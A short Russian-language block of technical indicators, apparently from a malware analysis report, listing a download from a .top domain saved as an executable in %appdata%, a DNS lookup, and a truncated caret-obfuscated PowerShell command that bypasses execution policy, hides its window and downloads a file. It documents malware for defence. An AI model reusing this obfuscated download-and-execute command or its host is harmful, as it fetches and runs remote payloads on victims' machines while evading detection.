Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^o^w^er^sH^E^LL.Ex^E -^e^XEcUt^i^OnpO^L^ICy ^bYp^asS^ ^-^NoprOFi^Le -w^I^ND^ow^s^ty^le ^hiD^De^n^ (n^E^W-oB^j^eCt^ Sy^s^tE^M.^net^.WEbcLI^E^nT)^.dO^WN^l^O^adFIlE^('http...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /c "P^o^w^er^sH^E^LL.Ex^E -^e^XEcUt^i^OnpO^L^ICy ^bYp^asS^ ^-^NoprOFi^Le -w^I^ND^ow^s^ty^le ^hiD^De^n^ (n^E^W-oB^j^eCt^ Sy^s^tE^M.^net^.WEbcLI^E^nT)^.dO^WN^l^O^adFIlE^('http...' (со скрытым окном)